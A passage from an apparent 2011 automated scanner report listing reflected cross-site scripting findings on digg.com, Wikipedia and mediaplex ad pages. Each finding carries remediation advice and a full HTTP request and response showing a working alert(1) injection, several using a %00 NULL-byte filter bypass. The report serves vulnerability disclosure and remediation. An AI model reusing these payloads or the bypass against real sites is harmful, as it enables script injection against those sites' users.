NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /img%0015cd3"><script>alert(1)</script>717828749f8/badges/16x16-digg-guy.gif HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:11:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=274235 10.2.128.108
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17578

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/img%0015cd3"><script>alert(1)</script>717828749f8/badges/16x16-digg-guy.gif.rss">
...[SNIP]...

5.35. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /img/badges/16x16-digg-guy.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00602d3"><script>alert(1)</script>0a817cdd92a was submitted in the REST URL parameter 2. This input was echoed as 602d3"><script>alert(1)</script>0a817cdd92a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /img/badges%00602d3"><script>alert(1)</script>0a817cdd92a/16x16-digg-guy.gif HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:11:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=291609 10.2.128.119
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17578

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/img/badges%00602d3"><script>alert(1)</script>0a817cdd92a/16x16-digg-guy.gif.rss">
...[SNIP]...

5.36. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /img/badges/16x16-digg-guy.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008a997"><script>alert(1)</script>afeedb8a9b5 was submitted in the REST URL parameter 3. This input was echoed as 8a997"><script>alert(1)</script>afeedb8a9b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /img/badges/16x16-digg-guy.gif%008a997"><script>alert(1)</script>afeedb8a9b5 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:11:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=319185 10.2.129.97
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17577

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/img/badges/16x16-digg-guy.gif%008a997"><script>alert(1)</script>afeedb8a9b5.rss">
...[SNIP]...

5.37. http://en.wikipedia.org/wiki/Chromium [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Chromium

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %0087638<script>alert(1)</script>6e02d0bd6fe was submitted in the REST URL parameter 2. This input was echoed as 87638<script>alert(1)</script>6e02d0bd6fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Chromium%0087638<script>alert(1)</script>6e02d0bd6fe HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 12:47:13 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/Chromium%0087638<script>alert(1)</script>6e02d0bd6fe
Content-Length: 5381
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:3128
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/Chromium%0087638&lt
...[SNIP]...
<p style="font-weight: bold;">To check for "Chromium%0087638<script>alert(1)</script>6e02d0bd6fe" on Wikipedia, see:
<a href="//en.wikipedia.org/wiki/Chromium%0087638<script>
...[SNIP]...

5.38. http://en.wikipedia.org/wiki/Chromium [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/Chromium

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00624aa"><script>alert(1)</script>c96737ffef0 was submitted in the REST URL parameter 2. This input was echoed as 624aa"><script>alert(1)</script>c96737ffef0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Chromium%00624aa"><script>alert(1)</script>c96737ffef0 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 12:46:54 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/Chromium%00624aa"><script>alert(1)</script>c96737ffef0
Content-Length: 5409
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq78.wikimedia.org
X-Cache-Lookup: MISS from sq78.wikimedia.org:3128
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/Chromium%00624aa&qu
...[SNIP]...
<a href="//en.wikipedia.org/wiki/Chromium%00624aa"><script>alert(1)</script>c96737ffef0" title="Wikipedia:Chromium%00624aa">
...[SNIP]...

5.39. http://en.wikipedia.org/wiki/List_of_country_calling_codes [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/List_of_country_calling_codes

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0048712"><script>alert(1)</script>4e011b11c98 was submitted in the REST URL parameter 2. This input was echoed as 48712"><script>alert(1)</script>4e011b11c98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/List_of_country_calling_codes%0048712"><script>alert(1)</script>4e011b11c98 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 12:47:02 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/List_of_country_calling_codes%0048712"><script>alert(1)</script>4e011b11c98
Content-Length: 5535
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: MISS from sq66.wikimedia.org:3128
X-Cache: MISS from sq62.wikimedia.org
X-Cache-Lookup: MISS from sq62.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/List_of_country_cal
...[SNIP]...
<a href="//en.wikipedia.org/wiki/List_of_country_calling_codes%0048712"><script>alert(1)</script>4e011b11c98" title="Wikipedia:List_of_country_calling_codes%0048712">
...[SNIP]...

5.40. http://en.wikipedia.org/wiki/List_of_country_calling_codes [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/List_of_country_calling_codes

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00935d7<script>alert(1)</script>b1eea4d5111 was submitted in the REST URL parameter 2. This input was echoed as 935d7<script>alert(1)</script>b1eea4d5111 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/List_of_country_calling_codes%00935d7<script>alert(1)</script>b1eea4d5111 HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 12:47:21 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/List_of_country_calling_codes%00935d7<script>alert(1)</script>b1eea4d5111
Content-Length: 5507
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:3128
X-Cache: MISS from sq39.wikimedia.org
X-Cache-Lookup: MISS from sq39.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/List_of_country_cal
...[SNIP]...
<p style="font-weight: bold;">To check for "List_of_country_calling_codes%00935d7<script>alert(1)</script>b1eea4d5111" on Wikipedia, see:
<a href="//en.wikipedia.org/wiki/List_of_country_calling_codes%00935d7<script>
...[SNIP]...

5.41. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14741/120372/GX1041_AugBanner_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f130"-alert(1)-"614655255ec was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D92436979f130"-alert(1)-"614655255ec&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 12:51:59 GMT
Server: Apache
Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT
ETag: "5d7df9-115a-4aaa4406baec0"
Accept-Ranges: bytes
Content-Length: 5223
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=http://altfarm.mediaplex.c
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D92436979f130"-alert(1)-"614655255ec");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D92436979f130"-alert(1)-"614655255ec");
mpck
...[SNIP]...

5.42. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14741/120372/GX1041_AugBanner_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32ddb'%3balert(1)//a462f1217a5 was submitted in the mpck parameter. This input was echoed as 32ddb';alert(1)//a462f1217a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D924369732ddb'%3balert(1)//a462f1217a5&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 12:52:00 GMT
Server: Apache
Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT
ETag: "5d7df9-115a-4aaa4406baec0"
Accept-Ranges: bytes
Content-Length: 5229
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=http://altfarm.mediaplex.c
...[SNIP]...
<a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=http://altfarm.mediaplex.com/ad/ck/14741-120372-2060-51?mpt=924369732ddb';alert(1)//a462f1217a5" target="_blank">
...[SNIP]...

5.43. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14741/120372/GX1041_AugBanner_728x90.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d1b2"><script>alert(1)</script>f9dae9fa5f7 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D92436972d1b2"><script>alert(1)</script>f9dae9fa5f7&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 12:51:59 GMT
Server: Apache
Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT
ETag: "5d7df9-115a-4aaa4406baec0"
Accept-Ranges: bytes
Content-Length: 5298
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=http://altfarm.mediaplex.com/ad/ck/14741-120372-2060-51?mpt=92436972d1b2"><script>alert(1)</script>f9dae9fa5f7" target="_blank">
...[SNIP]...

5.44. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14741/120372/GX1041_AugBanner_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5ee5"%3balert(1)//49f4fb4cb03 was submitted in the mpvc parameter. This input was echoed as e5ee5";alert(1)//49f4fb4cb03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D9243697&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=e5ee5"%3balert(1)//49f4fb4cb03 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 12:52:00 GMT
Server: Apache
Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT
ETag: "5d7df9-115a-4aaa4406baec0"
Accept-Ranges: bytes
Content-Length: 5225
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=e5ee5";alert(1)//49f4fb4cb
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=e5ee5";alert(1)//49f4fb4cb03");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=e5ee5";alert(1)//49f4fb4cb03");
mpvc = en
...[SNIP]...

5.45. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14741/120372/GX1041_AugBanner_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 358a9'%3balert(1)//baf0f6a66bf was submitted in the mpvc parameter. This input was echoed as 358a9';alert(1)//baf0f6a66bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D9243697&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=358a9'%3balert(1)//baf0f6a66bf HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 12:52:00 GMT
Server: Apache
Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT
ETag: "5d7df9-115a-4aaa4406baec0"
Accept-Ranges: bytes
Content-Length: 5225
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=358a9';alert(1)//baf0f6a66
...[SNIP]...
<a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=358a9';alert(1)//baf0f6a66bfhttp://altfarm.mediaplex.com/ad/ck/14741-120372-2060-51?mpt=9243697" target="_blank">
...[SNIP]...

5.46. http://img.mediaplex.com/content/0/14741/120372/GX1041_AugBanner_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14741/120372/GX1041_AugBanner_728x90.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 368e1"><script>alert(1)</script>12c7fa4208a was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14741/120372/GX1041_AugBanner_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14741-120372-2060-51%3Fmpt%3D9243697&mpt=9243697&mpvc=http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=368e1"><script>alert(1)</script>12c7fa4208a HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/352572792/direct;/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 12:52:00 GMT
Server: Apache
Last-Modified: Tue, 16 Aug 2011 19:18:59 GMT
ETag: "5d7df9-115a-4aaa4406baec0"
Accept-Ranges: bytes
Content-Length: 5298
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://clk.atdmt.com/go/352572792/direct;ai.236393308.233540406;ct.1/01?href=368e1"><script>alert(1)</script>12c7fa4208ahttp://altfarm.mediaplex.com/ad/ck/14741-120372-2060-51?mpt=9243697" target="_blank">
...[SNIP]...

5.47. http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcf78"-alert(1)-"ce92a136ff1 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

